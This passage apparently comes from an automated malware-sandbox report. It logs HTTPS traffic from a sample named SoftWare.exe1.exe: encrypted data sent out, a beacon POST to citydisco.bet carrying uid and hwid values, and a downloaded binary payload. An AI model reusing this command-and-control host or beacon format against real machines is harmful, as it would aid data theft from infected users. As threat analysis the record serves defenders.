2025-03-13 12:40:16 UTC	15331	OUT	Data Raw: 07 aa c8 de 8b d4 c1 c6 bb 24 b2 7f c1 33 8e 1e ed 75 e5 a6 28 b6 e7 8f 3a ec 0b ad d1 38 86 4c 3e 13 06 11 89 f3 9e fb a4 72 4d 57 2f 04 c0 27 69 a6 f8 9e d3 4c ed cc e9 1a 0b b8 22 29 89 67 43 77 68 ae 69 57 20 74 ce e1 4b a8 66 f1 57 46 fc 2f dd 3e 37 ef a8 12 e9 94 79 14 e3 89 bb 7b 32 67 99 b1 2d 4c 2f 8c 67 ff 7f 56 f9 5f b5 59 13 1d 60 78 b1 9e 7c b5 e7 b6 7a e2 ff 22 8c e3 f0 55 c4 a8 8e 89 e5 91 db 8d 35 9f cb bb 8b 17 02 fe c3 bf 62 04 22 fe 72 59 49 03 6a 2a 0b d1 a4 d4 6d 02 9d 81 a8 66 ad ed 55 d0 e4 b6 e2 99 25 24 bf 18 1d 09 3e 04 2d 20 ee cc 0a e7 4d 58 43 2d 7c e7 e7 c3 d0 7c 4a fe 65 c0 3c 8b 7f 2e c1 7e 36 9f 86 fb 05 81 68 ae 8f 03 75 93 04 66 56 35 12 b0 b9 f2 0c 03 96 59 f1 e8 5a 33 14 a9 9b 1e 94 3d 99 13 1c b8 4b 50 43 27 5b 82 aa Data Ascii: $3u(:8L>rMW/'iL")gCwhiW tKfWF/>7y{2g-L/gV_Y`x\|z"U5b"rYIj*mfU%$>- MXC-\|\|Je<.~6hufV5YZ3=KPC'[
2025-03-13 12:40:16 UTC	15331	OUT	Data Raw: d3 ff 37 78 86 d0 90 24 1a ce d6 0d 9a ea ea 5a 91 a7 d0 19 98 a0 64 0d da 67 d9 30 92 26 05 72 d5 d1 2c 46 e9 8b e8 6d c7 86 22 64 34 bc a4 97 ca 4b 39 b5 53 fd f4 46 7f 09 cb ea f8 03 a3 6f 58 54 eb 7f 3f 18 ee 2e b2 96 b7 7f c4 11 68 79 3f 19 83 3f c0 5a ef 4f eb 68 8f 38 2e bb 26 7b 69 d7 40 52 44 8e d8 b2 56 e8 6f 34 04 b1 55 21 39 37 0b a8 71 70 38 1c da 65 79 bf 5a 1f 43 9c 50 73 2d fc 2f f4 e7 68 f2 08 2e 55 8c a2 f8 8e 62 7a c4 aa 56 d3 19 43 fe cb 36 20 4f 0c f9 e4 99 6e c2 bf 65 54 38 cc 4f 47 e5 d7 e1 8f 31 5d d2 3b 5d 03 fa fd 75 94 2d 7c 61 4f e1 3c c7 b4 23 d2 aa 28 53 50 ca a6 55 7b 7c 02 15 13 56 c5 1d 81 d6 23 c4 25 ca e7 1e 6a a9 4c 17 0a 60 76 5e f4 96 13 6c cd 5d 95 bf 4f cb b8 9a e4 3d c8 7a c7 1e 46 ae 86 ef e2 50 48 b5 ea 5e f5 5c Data Ascii: 7x$Zdg0&r,Fm"d4K9SFoXT?.hy??ZOh8.&{i@RDVo4U!97qp8eyZCPs-/h.UbzVC6 OneT8OG1];]u-\|aO<#(SPU{\|V#%jL`v^l]O=zFPH^\
2025-03-13 12:40:16 UTC	15331	OUT	Data Raw: ca 1e 0a 61 10 cf 0b b2 09 ee 82 73 8b 39 37 86 4e 0a 42 d3 3c f8 36 0f ca 98 1f 97 b5 81 d1 9d 03 92 27 8f 01 63 12 5a 67 32 55 11 9f 21 52 ae 57 dc 6a f2 09 2f 25 5a 0f f9 ee 51 fc f2 81 a7 30 d5 6b a8 35 34 7e 06 55 4d d6 2f cc c6 a1 43 12 7f 1f 16 49 05 8c cb bb a0 03 9b 70 d1 0e 81 b6 f2 22 6e d4 16 d9 7e 79 dd eb da 24 70 a4 c4 ad 18 75 7e 02 f4 5c 05 7a f7 26 f4 74 8b e8 8f e0 86 e8 bc 16 b3 40 a0 f7 cf 46 34 80 42 14 0a e1 e8 c0 0b a0 5f 97 15 15 5f c9 e3 a4 35 6f 4e 1d ec cc a8 fd 86 11 10 e8 a4 39 0c 71 ad 7e de 39 ca d4 a1 c0 92 1b 6b 7b a2 eb 5e d1 af 24 ec 32 02 0b 81 b5 92 d8 db 81 29 d8 83 de 20 3c 6a 7d 36 9f 5a 11 5d 50 4a c2 56 c4 f8 9e 79 64 e0 2b 88 73 73 22 45 7d 82 95 be 9a 7f 18 c4 06 14 9f 95 fc 1a f0 89 5d 48 a0 81 c5 46 c0 e7 86 Data Ascii: as97NB<6'cZg2U!RWj/%ZQ0k54~UM/CIp"n~y$pu~\z&t@F4B__5oN9q~9k{^$2) <j}6Z]PJVyd+ss"E}]HF
2025-03-13 12:40:16 UTC	15331	OUT	Data Raw: b1 9f ae 9f df 7f 29 07 97 21 e2 49 06 50 a2 6f d1 de 5a 4f 92 2d 95 81 9d ce 15 26 65 98 fe 4a 28 6d 88 7f 4c b2 77 95 66 e1 00 81 a7 2d 60 43 f2 db f5 3e 1e 37 48 97 8e 99 fd af d1 60 f9 09 7a 40 22 0a 6d fd fe 9c 66 5d ce 46 ca fd d2 82 14 96 e5 47 d8 be bd 07 96 32 3a 63 a6 98 48 48 e5 62 7b dd f3 39 4e f9 a5 c2 ba 97 2b 6e 24 e7 30 08 54 53 c7 7a 0b b0 c0 30 c6 2a 2a bb 2f c4 4c cb 2b 59 72 e3 80 81 02 1d b7 25 67 54 01 bf 46 67 2d ba 46 9d 37 5d 92 42 8a 56 63 9a 8a 39 23 18 31 50 eb 25 2d 58 b0 54 9e 4d be 69 41 79 13 13 b5 60 69 b6 6e 79 21 a7 a5 1e c9 0e 66 ee b0 95 0a 65 52 87 40 82 75 58 46 84 e1 3a 20 9a ec 08 c3 52 db 74 bc 82 ac f7 8a ac 80 0e b5 74 73 31 58 d9 05 74 ec 98 ce 95 39 79 a7 6c a8 f6 9d da 91 55 d8 48 b3 5c 34 1d 76 7b 63 e4 1f Data Ascii: )!IPoZO-&eJ(mLwf-`C>7H`z@"mf]FG2:cHHb{9N+n$0TSz0**/L+Yr%gTFg-F7]BVc9#1P%-XTMiAy`iny!feR@uXF: Rtts1Xt9ylUH\4v{c
2025-03-13 12:40:16 UTC	15331	OUT	Data Raw: 70 29 8d a9 ce 86 3f 6d df ee 9d 1b cd 0c 89 28 a0 7b 1d f1 c4 3f 0e 89 7c a4 e6 13 5d 92 b5 88 06 63 12 87 47 39 1f 94 8e 59 e9 2e 7b 70 34 e9 14 57 f9 f8 65 77 61 f4 39 13 7b ce 09 eb 24 34 d5 0b 39 2b 71 21 26 3f 6e f8 9f 2e d2 ff fe 27 75 74 d9 42 ac 08 df 9c 7c 9f 14 71 bb 01 09 0f e5 68 98 69 13 9f 9a 2f f6 a9 62 4e 6f c4 49 86 3c 97 60 f1 11 e8 be e2 26 c7 3a de 7f 2c 8f 89 d5 52 8c f1 f9 2f 30 83 86 b8 40 b9 31 f8 cb 8d 66 01 fd 2e a9 4f b4 09 29 c6 f6 22 7f 38 62 20 35 22 60 d6 ad b5 07 fb 19 b8 3f c1 da 41 15 83 af bd 80 8e e8 0f db 53 d8 cd 65 b0 d5 2a 80 4d 9e ba 7f c4 2e 0c 4d 84 77 c6 fa 16 2a 32 41 65 31 2a 61 0e ec 43 16 74 d2 f1 3f fb b0 c3 cc 68 a2 0a 0b 63 b3 ea 97 75 3b 28 99 4c 7c 2e 7b 67 dc 65 02 db bd 43 5c 5c 59 36 f7 a9 b8 d5 a4 Data Ascii: p)?m({?\|]cG9Y.{p4Wewa9{$49+q!&?n.'utB\|qhi/bNoI<`&:,R/0@1f.O)"8b 5"`?ASeM.Mw2Ae1*aCt?hcu;(L\|.{geC\\Y6
2025-03-13 12:40:16 UTC	15331	OUT	Data Raw: b4 4c d6 7b e5 57 3e 00 c6 d9 96 7d bc 7a 90 39 8c 4e a0 8d be e2 3b 76 f1 e2 1a fa 29 ad 20 a8 df 45 ac a1 ea 04 d9 f3 07 80 3d 0b 83 8e 5f 10 8e 1f 77 59 74 59 c6 09 08 3e 80 52 ef c6 d1 cd b3 c4 14 86 ba 04 44 ce 25 0c 2c e9 d1 1d a1 99 38 08 7e b0 26 a7 9b 68 54 bc 2f 1d ce 85 80 e3 40 c9 70 9f f2 a3 ea 26 87 72 d7 e1 4f fc a0 b1 8d 36 64 5b 2e 08 d9 84 49 66 f9 a3 2c 53 2a dd c6 87 80 aa 5e 8b 0b 4d 19 8b ba 96 68 96 10 be f1 6e de 22 21 9a 2e 83 10 b2 1e c9 22 3f b0 73 81 ef ab 6f be 5b 36 99 62 69 a5 ae db f3 3b ea e4 14 9e 63 04 bf 4a f0 a1 e4 03 06 12 40 a8 a8 08 1e 17 0a b8 65 24 44 2a fc 3a e4 48 1e 91 9f b3 40 79 12 0a b4 8f 12 00 a7 b7 d9 ca 56 18 a4 c6 e8 1f e1 83 01 51 d1 de 3e 05 3b 42 2e 57 4e c1 18 c6 68 10 e3 0f ce 95 0e dc b2 2f 17 bf Data Ascii: L{W>}z9N;v) E=_wYtY>RD%,8~&hT/@p&rO6d[.If,S^Mhn"!."?so[6bi;cJ@e$D:H@yVQ>;B.WNh/
2025-03-13 12:40:16 UTC	15331	OUT	Data Raw: 9a 39 8e 36 29 73 01 74 6a 17 09 99 33 3c 10 7b ff c4 80 c9 87 f0 f0 54 24 02 1d e3 ff 3e ea 8a d2 27 32 c4 b3 f5 dd 6b b8 fd e3 94 07 1f 88 23 75 36 03 80 8b 72 b6 51 7f 71 56 43 7b 72 e9 09 75 66 d7 0e 33 75 f3 02 10 6f f9 b2 45 4f d5 92 0c b8 34 fc 03 f1 2a b4 3d fe e4 47 db 16 59 13 45 94 c1 65 50 6f 4d 41 f0 1a 2f d1 5b 9a 11 c7 66 77 d1 ef 8c 3c 56 d6 a9 2f b2 44 28 e7 66 d4 f2 a7 2d 82 c1 0d 5d 2e 14 ef d6 00 db 6f 15 00 76 7b 27 35 bf 0e a9 65 2c 41 db 4c 9b b0 e9 47 98 7a 7a bb c2 1c 7c a6 f7 48 0c 1d d6 1e 7b f9 f6 78 3c cc 5c dd ee 39 5a 11 74 9c 38 e4 d9 a0 45 dd ec 90 8b 21 25 dc ce e6 5a 9f ad 10 4a e0 a6 46 62 aa ba 0e b1 b9 9d de a7 dc d9 d6 d2 91 78 c8 02 73 e2 5c 4c 60 a1 c6 8a fe 35 4c b4 b4 ed 03 2d af 68 94 ae 9d 98 ed 8a b2 06 c9 db Data Ascii: 96)stj3<{T$>'2k#u6rQqVC{ruf3uoEO4*=GYEePoMA/[fw<V/D(f-].ov{'5e,ALGzz\|H{x<\9Zt8E!%ZJFbxs\L`5L-h
2025-03-13 12:40:16 UTC	15331	OUT	Data Raw: 25 23 08 30 b5 d3 f0 66 d3 30 ab d8 54 19 e8 9f e9 9d 9d a2 3f d8 6c 00 74 28 0d b0 3a 4a 11 8d 88 0e cc 02 91 e6 1e 8f 83 86 fe cd e7 3b ac 7a 86 c7 62 ba cb b2 9b 59 ae be da bf ab 24 15 60 61 89 ed a7 91 0a ed 50 39 45 fd 3e 0e de 54 f3 04 12 98 f0 ea 05 67 ec 91 56 08 a9 53 cd 4e ff f9 82 a5 c0 1f ea 51 a8 57 b1 dc 45 80 32 72 5d 08 56 0b 9d 77 22 d0 5d 29 cc ac 7b c2 1d 36 bb f8 28 fb d3 0f da 2a 65 9f 93 cf 93 8d 4c 8c ce ca 3a cd d3 94 8e a8 22 f9 ff d4 a0 1b 51 26 fb 65 20 9e a3 59 ac e1 11 a5 8f 62 e1 0f 95 35 ba b6 31 b5 6e 35 6f 8f 9a df 66 10 85 00 a8 6c 68 8b ac e3 33 8c ba 66 63 9f 4d ee 73 31 b4 20 5d 77 fb 3a 75 e8 d0 3f 92 2b a1 1c 01 d0 f5 69 8c 19 36 b7 20 ee 39 08 e2 2e bd d4 aa c2 13 10 20 ee 46 73 03 48 df 1f cc f6 1f d1 a0 5f 55 e1 Data Ascii: %#0f0T?lt(:J;zbY$`aP9E>TgVSNQWE2r]Vw"]){6(*eL:"Q&e Yb51n5oflh3fcMs1 ]w:u?+i6 9. FsH_U
2025-03-13 12:40:16 UTC	15331	OUT	Data Raw: 7b fa 77 2b 53 4e 38 ad 13 6c be fb d7 7e d0 45 1b 9d ab f1 d5 8b 7c 03 45 45 50 13 22 29 89 91 5e a8 15 3b 21 70 be 7d 5e fa 3a f5 2c b8 b6 4f 43 15 21 21 5a 98 a1 93 c3 0a a7 7e 14 c3 58 aa 2a b4 4c f2 ae b6 8a 65 3b e5 93 f0 ca 64 eb 3d b2 65 ff b4 cd 6b 06 56 d5 7a fb 2a e5 8e ec 65 13 ef 53 a9 8f 01 36 ec 77 2d d7 f7 8a c0 10 b2 b0 a2 85 84 da 56 10 75 cd 7d a9 3e 56 40 10 79 45 c0 1b b1 9b f7 75 76 ac 57 fa ef ef 69 7a 51 dd 67 f7 49 be a4 73 f9 d1 f9 cd c4 3f 29 9e a0 b1 57 05 49 ba c6 bf fb 8b 1c ed 0b ba 2c d0 20 59 81 b5 6a 36 bd 25 26 ec 52 00 73 c1 72 e4 5d 52 c7 44 b5 41 30 96 a2 7b c4 de d6 91 2f 2f b2 7d e2 16 01 61 9a 70 42 0b 32 e5 e0 8c 10 da 13 73 a8 e9 95 84 61 d1 e3 f4 60 8a fe 2c 27 d8 49 16 1f ad a2 56 fd 4e 05 58 70 61 a8 01 a4 b8 Data Ascii: {w+SN8l~E\|EEP")^;!p}^:,OC!!Z~XLe;d=ekVzeS6w-Vu}>V@yEuvWizQgIs?)WI, Yj6%&Rsr]RDA0{//}apB2sa`,'IVNXpa
2025-03-13 12:40:19 UTC	815	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 12:40:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5sTvke3lin%2BY4IHcbMtQst5mVZyH1xr1mt%2FEEsKBrpjZ8PxvHcQMZdytQUs9k4vETOIkAGrds5zDjpUZTFIZjcF4kdxK1w9MXUzrSjw1drJNJ6vT%2FmMkiTinlQkFAkmB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91fb994dd9d46778-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=38799&min_rtt=36271&rtt_var=10275&sent=225&recv=435&lost=0&retrans=0&sent_bytes=2831&recv_bytes=572924&delivery_rate=112470&cwnd=252&unsent_bytes=0&cid=8718b6de98b9c0ee&ts=3409&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49693	188.114.96.3	443	4600	C:\Users\user\Desktop\SoftWare.exe1.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 12:40:20 UTC	263	OUT	POST /gdJIS HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 99 Host: citydisco.bet
2025-03-13 12:40:20 UTC	99	OUT	Data Raw: 75 69 64 3d 38 30 37 31 32 36 30 36 62 36 32 33 32 64 34 37 30 38 66 66 37 65 34 62 66 66 36 37 37 32 37 37 38 62 30 38 32 38 39 37 66 65 36 33 37 32 39 64 31 33 32 39 26 63 69 64 3d 26 68 77 69 64 3d 43 38 45 45 39 33 36 38 43 37 35 43 32 46 38 44 30 42 30 42 30 41 42 44 46 30 39 37 37 45 35 32 Data Ascii: uid=80712606b6232d4708ff7e4bff6772778b082897fe63729d1329&cid=&hwid=C8EE9368C75C2F8D0B0B0ABDF0977E52
2025-03-13 12:40:21 UTC	782	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 12:40:21 GMT Content-Type: application/octet-stream Content-Length: 10452 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VaUov80z5%2BBAkYkAyGvWGBnVSFoFLhOW%2BMT2UyiT0t9UAP6U0S%2B1fAKOkDVH5%2B2qmkgvVswU6xAUknMfR9dm2YVa21AnRS8GTrsNg0wZZKpeGHktrwB3la9uJnd3Gm4q"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91fb996c9a19e853-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=48483&min_rtt=35992&rtt_var=20770&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2831&recv_bytes=998&delivery_rate=113663&cwnd=252&unsent_bytes=0&cid=5faed6d277d6a189&ts=1003&x=0"
2025-03-13 12:40:21 UTC	587	IN	Data Raw: e3 26 9c 68 62 11 5d b5 aa b6 2b bb c7 01 6c 4a 9c 1b ba f9 49 71 c8 37 03 64 2e d1 ca 43 f5 8c 76 7c 9b 95 56 fc d5 84 a8 a0 45 e8 de 5c 88 9f b4 e1 9d 73 ba 5f ea fb 9a 48 08 e6 95 e8 e3 b3 b3 cd cf 37 70 a0 38 9c 1f 1d b2 0c e2 64 07 47 43 a5 78 15 11 91 df 05 72 1c 86 d2 97 17 26 b2 9c 28 d6 82 f0 0f 12 fb 6a 8f 06 3a e0 00 65 41 d4 ca 3a 59 2b 60 ea d1 b7 00 15 0e ac 19 c1 41 0a ad d7 fa 2a 8d d9 e4 61 20 f9 45 58 87 70 3c 3a 69 a0 e3 01 54 1f 24 8d 40 8b b9 92 d4 1b 06 1d f3 bd 20 03 59 1b 93 4d 9b 2e e4 80 26 b6 1e 75 11 82 01 26 f3 c4 06 9a d4 b4 84 65 06 14 c2 9b 8d 3b 8a dc 52 79 14 04 38 b2 40 d7 e3 35 29 d7 cb 79 a3 79 01 40 37 8e 1c c2 18 fb 75 15 73 dc a7 ad d5 1f 58 a2 46 7a 28 9a 7a d6 01 0a 01 1c 42 4a e9 05 fd 52 6f 16 10 ac 03 2c 46 a0 Data Ascii: &hb]+lJIq7d.Cv\|VE\s_H7p8dGCxr&(j:eA:Y+`A*a EXp<:iT$@ YM.&u&e;Ry8@5)yy@7usXFz(zBJRo,F
2025-03-13 12:40:21 UTC	1369	IN	Data Raw: 25 2f 44 f0 65 1e 7c 12 ae b5 15 6c 5f 66 a9 d1 d9 2a 82 a5 70 b6 9e 77 6a ed 6f 5a 2a 8e 11 fb b6 c1 e7 35 90 29 10 2d dc c8 c3 fe 45 5c 66 20 01 e3 7f c2 f6 b4 17 6d 30 c4 0c 2a af a3 6b d1 db fd c3 fd c4 63 99 ca 0a ff 0c 84 47 1e 19 2d 89 42 4b 85 8c 10 2e 51 27 db 8a 5f cd 66 f9 a4 59 68 fe 6d 1f 02 ab dc 23 e7 4f 26 ae 8b e6 34 fe db 83 4b 65 8e 74 4b 26 dc b8 14 50 0f e1 2e 89 7e 64 7a e2 9a 5c f2 d1 f3 c6 0c 1e 9e a8 88 ab 6a 07 87 f2 35 9f 3a 20 59 9a 29 5a 1b c4 4e 05 91 cb b0 a5 9a 60 ca f6 18 76 6b 16 26 16 0c 4f 0c d2 0c 64 20 87 92 79 e4 0e 5a 45 8d e4 8d 86 e4 e9 a6 15 e3 a2 f3 ae 4b 83 56 4b 5f e6 49 22 b4 3d 97 91 f8 52 5b 16 f3 9a dc 75 78 3a 3e 56 d6 c8 95 62 bb 81 34 b3 49 6d 61 5a bd d8 ab 6e 25 70 5f 1a cd 5e bf 1f 68 0c dd aa 44 f5 Data Ascii: %/De\|l_fpwjoZ5)-E\f m0*kcG-BK.Q'_fYhm#O&4KetK&P.~dz\j5: Y)ZN`vk&Od yZEKVK_I"=R[ux:>Vb4ImaZn%p_^hD
2025-03-13 12:40:21 UTC	1369	IN	Data Raw: ed de da 7c 45 5d 7c 07 ff 18 fc 0a 05 fd 65 5c 20 c2 d2 3f 89 06 04 53 20 32 44 7f 23 88 21 42 c5 1d 3e e6 16 39 4d 99 e3 72 d4 48 28 82 26 ab e4 ee ab da 8d 5d 0d 0a ba d4 e7 5b 88 e5 73 e5 29 3f 22 47 6f e5 ee 79 e3 f3 6a 53 26 73 f4 94 f3 0c 62 63 35 a5 e7 4f fc 97 82 b7 70 1c 0a 66 bc 4e 9f c9 45 a2 ae c5 27 67 86 13 ae 3e 2a 60 5c 2e 6d 33 ae 41 4c 6c dd a4 18 fe bd 56 dd 00 c2 e2 11 a5 2d 0c 92 24 90 2e af 2a 2c 6f 52 cb 27 4c b1 35 cd 7f e4 8d 70 51 66 dc 8d f6 e6 4b fe 24 fa 9c ce e5 44 f4 3d 31 82 7f d6 77 96 39 45 42 16 80 33 ce ee 5c 4d 0c 7d e1 b0 09 de 06 a0 bf ec 3b 2b d3 23 53 3e a6 f7 71 76 ec ae 94 42 78 fc f2 41 5b ec bf 5d 56 40 a8 e4 9e 5d be b8 1f 8c cd fe 87 d8 fd 14 d2 57 1e 5a d6 ef 39 0f 80 04 e1 6a 9f a7 8d 79 bb d2 01 d6 8a d3 Data Ascii: \|E]\|e\ ?S 2D#!B>9MrH(&][s)?"GoyjS&sbc5OpfNE'g>`\.m3ALlV-$.,oR'L5pQfK$D=1w9EB3\M};+#S>qvBxA[]V@]WZ9jy
2025-03-13 12:40:21 UTC	1369	IN	Data Raw: e8 21 73 0c a4 ae f2 ff 3a a7 ac c4 15 10 8f 05 c2 90 17 80 c0 50 9a ad 6c 8d a9 8f da 0e 3e de 13 08 74 07 50 13 45 09 e7 96 d1 95 2d 76 15 ad c5 81 e8 a5 db 21 12 ff 96 fd 85 8e 41 53 c3 0e 4a a0 bf 66 43 5f 43 10 88 45 93 48 00 65 42 5a 12 4f ea 26 9a 65 fb 4f be 64 0d 2d 69 56 63 de 47 11 05 5a 11 5f 99 f3 ba c5 74 0f 52 3a c8 72 5e da b5 0f ef 55 cd af aa b9 bd 98 8f 58 c0 77 d6 8e 65 8d 31 2f 15 0c c7 9d 14 cb ca 08 a5 cf fb 35 cc c2 34 fc 8a 5b b3 6a fd ae ba 8d db d0 79 ab 6f 22 d1 81 ad 1e 96 03 40 1b 65 91 f4 95 ae d9 9c 3b a7 67 7d f5 88 e5 dc 21 28 bb 55 98 99 87 7b 39 3d 0f 49 37 c1 12 15 d1 82 36 2d 61 f6 e3 c9 04 51 0a aa d1 93 a1 78 0b d4 06 98 d5 93 df 6d a4 64 68 b8 3a 6e 67 a2 6d 16 23 af 40 51 e4 10 5d f7 a3 e7 b9 55 4c e6 28 20 f9 26 Data Ascii: !s:Pl>tPE-v!ASJfC_CEHeBZO&eOd-iVcGZ_tR:r^UXwe1/54[jyo"@e;g}!(U{9=I76-aQxmdh:ngm#@Q]UL( &
2025-03-13 12:40:21 UTC	1369	IN	Data Raw: 60 db d5 e5 ba 2a d5 f7 a3 36 92 39 b7 9a 20 ee 93 10 2e 8c df d6 50 7a 4b e6 8a d6 eb 2b 3e b7 51 72 ec c6 af 44 97 c6 49 d6 7b 98 25 e4 72 99 9b 8d 67 de 96 f4 c0 f7 de 05 70 56 09 2f 60 bd 1d 1f c2 a8 55 13 06 52 63 99 e2 88 6d 17 39 80 f5 49 ca e0 88 01 67 35 7b 54 1a f6 47 bc c3 59 85 ec 73 9f 01 da a9 aa 40 07 b0 67 9e c5 e9 e8 5c a1 86 73 47 c4 7a 8b 15 10 0d 30 56 ec e6 72 0f 50 79 77 4f 0a ff 77 9e a1 31 10 5d 7c 0a ed aa db 82 50 81 3a 7c b9 65 67 bf 5e 0f 2f 43 59 c6 58 2a c2 17 61 21 9a cf 20 c6 24 27 9c ea 8d ea 90 10 70 4d 35 34 2a 4b 62 3a 08 a7 ba ce 03 0b e1 bb a8 c2 49 b0 bb 5f b7 37 18 61 3e 8e 07 2f a3 77 f9 29 5c 2a dd 45 87 17 dc 89 15 92 53 89 1d 62 ca 6e 2d 1e cb f7 80 fa 83 70 05 79 a2 9c be e4 04 57 66 7f 71 d7 1c 14 24 65 99 2a Data Ascii: `69 .PzK+>QrDI{%rgpV/`URcm9Ig5{TGYs@g\sGz0VrPywOw1]\|P:\|eg^/CYXa! $'pM54Kb:I_7a>/w)\ESbn-pyWfq$e*
2025-03-13 12:40:21 UTC	1369	IN	Data Raw: e4 07 ea 2c 21 06 e7 87 94 2a 84 af a1 d8 5e 64 eb 86 f7 24 0e 34 d4 5e c0 01 e0 62 d3 c9 a2 47 e1 bc 8d a8 f4 a0 fc 8c 9b ab c0 d1 7e 1b 29 ef 5d 5d 9a c0 8f 63 62 07 fc fa 8c f1 61 0c 83 06 ed 40 ea 5f 50 79 50 ae da e5 17 f5 57 54 1b 7c c8 98 97 bd 8b 1f e9 9d 4a 95 78 bb 09 c4 0f 4a fb 9c 10 f7 16 78 37 ba 86 9b a4 5f 8c d5 7b 6c 07 4a f9 61 27 d5 38 64 84 88 a5 75 db f3 f4 88 a9 41 22 f2 89 72 55 9d d2 cb bf f3 d5 c9 13 0f 4f 86 53 b0 07 d4 b6 35 59 67 25 f1 5e 77 c0 d6 61 9b a9 fe fb 58 69 ec 0f 39 c2 96 3f 31 83 79 d0 d1 bc fc a4 8a bc 43 d8 21 ad 9e e8 c9 1b 33 c4 c1 f6 c2 cd 27 3a 83 4a 0d b5 07 fa f8 3a af 50 f5 3c 36 33 35 39 57 b9 de 91 c0 56 86 33 e5 4a e9 63 e8 2f 1b 48 1c 33 1f a3 46 f3 3b d6 13 5d 25 37 7b 39 32 49 2d 00 65 a8 f7 d2 3c 8e Data Ascii: ,!*^d$4^bG~)]]cba@_PyPWT\|JxJx7_{lJa'8duA"rUOS5Yg%^waXi9?1yC!3':J:P<6359WV3Jc/H3F;]%7{92I-e<
2025-03-13 12:40:21 UTC	1369	IN	Data Raw: 23 35 58 6d 5a 09 d7 b4 7e e1 3f ae 63 9d 63 3d 0a 23 7e 4f b1 39 7a 6d 80 a4 d1 67 db e6 6a 5a b2 b4 b6 83 c0 36 de 0d 1a 38 70 60 04 be e7 4c d5 43 3e af 19 38 d5 ce fd 80 3b 27 ca ce 8f 42 7b fd 05 ed cd 37 41 fa 11 3b df 74 c1 72 ff 4f f5 c3 07 c7 f5 9a 09 96 17 e5 8e 32 d9 63 e7 76 91 44 7b 81 34 99 fc 67 64 71 a6 d7 61 b7 11 40 cc 9b f7 ba 9c 19 39 f3 ad 53 19 a0 c4 8c cc eb fc d6 72 11 09 a6 81 b0 2d 96 96 72 9d b8 3d d6 10 96 b4 7a 66 89 f8 0e 90 61 8e 6e a8 d5 a2 86 83 6c 9c 1a 7f 4e 4f 01 f1 2f e2 03 73 70 63 58 09 9f 69 42 1b ca c1 89 71 41 f2 51 ea 23 90 75 01 35 7e 95 03 31 46 cf a3 8c c6 d5 bd 38 db ea 5c 8d 02 bd a4 4a 83 41 75 25 9f 40 ea 59 ed 82 f6 5b 5a 12 7c 5c 8c 3b 0c ac 27 9e 17 c7 2e 15 56 b6 fd 9c fe 2d 64 50 02 84 e7 66 1e 17 ca Data Ascii: #5XmZ~?cc=#~O9zmgjZ68p`LC>8;'B{7A;trO2cvD{4gdqa@9Sr-r=zfanlNO/spcXiBqAQ#u5~1F8\JAu%@Y[Z\|\;'.V-dPf
2025-03-13 12:40:21 UTC	1369	IN	Data Raw: 78 ee c9 2a 23 49 93 05 f3 af 06 2e c4 0b f2 9d d3 0d dd d2 94 0b 9e 99 35 40 c1 cf 5f a7 ba a2 1c 37 2e 37 50 e8 07 fe ba 76 ea c5 65 17 d9 4a 2e ec 41 5d fe 05 b0 b7 6c 3c a4 34 62 47 a2 73 3c a6 74 9e b0 0b 30 ca c2 ed 5a 80 47 05 a7 07 e5 46 91 d6 da 54 49 2b bd 5b 30 c2 cc 1e b4 a7 50 43 20 14 3f 60 c1 a1 9d 6e a0 83 c9 78 56 78 4d 1b a2 1a 43 aa d9 10 a9 1f ac bd ac d7 c2 b0 da b3 62 40 43 97 5f 6c ea 0c b9 ef 29 b7 c4 32 83 c7 23 ec 69 25 38 e9 ad 84 b5 da 31 6e 59 eb 78 fa 55 89 d6 62 96 1c 57 8d a4 76 05 31 e1 6f c0 b7 98 f1 df 8b 42 54 ed b3 87 7b 89 bb bf 38 76 c7 4e c4 ec 80 4c 54 f4 68 55 06 9f 56 17 7e 45 19 aa 45 78 12 b7 35 28 90 d7 60 37 89 a6 4c 76 55 66 a0 6f 06 99 24 93 57 c1 46 8b 27 cc be 79 d7 0a 17 74 21 71 20 17 c4 6d fa 08 97 d3 Data Ascii: x*#I.5@_7.7PveJ.A]l<4bGs<t0ZGFTI+[0PC ?`nxVxMCb@C_l)2#i%81nYxUbWv1oBT{8vNLThUV~EEx5(`7LvUfo$WF'yt!q m
2025-03-13 12:40:21 UTC	282	IN	Data Raw: 7c b0 3b e4 be 50 7d 76 54 9c a4 04 05 93 bd de d9 84 ee b8 c4 fd 82 fc 48 63 fa 1d aa c2 77 f9 57 29 ae 65 e5 72 69 3e ae fa a6 0b 13 37 47 34 95 69 7d 03 60 0b 92 99 91 5f 0f 6d fc 42 a8 8f 1c b2 10 6d be 8a 54 2e 50 57 cf 54 0a 5a a6 d2 e1 e4 be 5a c7 12 f6 fb b3 bf d5 64 dc 4d 97 7d e7 27 a6 b4 48 72 51 8e 6c e9 69 c1 0a a1 de b3 40 dc 11 cf 50 bc ef 61 63 f6 dd 0b 97 c2 fb b3 3d 8c 8f ed 69 7f e6 e4 54 94 0b 51 d1 90 73 e6 50 4b d3 e0 3f e0 f8 81 69 42 a0 19 9d 73 8f 54 92 cc 01 fc 2e 07 9a 11 c8 98 48 2b 46 c9 9f 33 01 c5 71 35 eb 4a cf 6d 9f cb 2e a3 6e 57 f8 f3 12 b4 28 0b 91 4b 50 6d 79 e3 6d 25 46 9d 09 de 50 39 b0 fc 68 f3 9f 51 db 6c bf 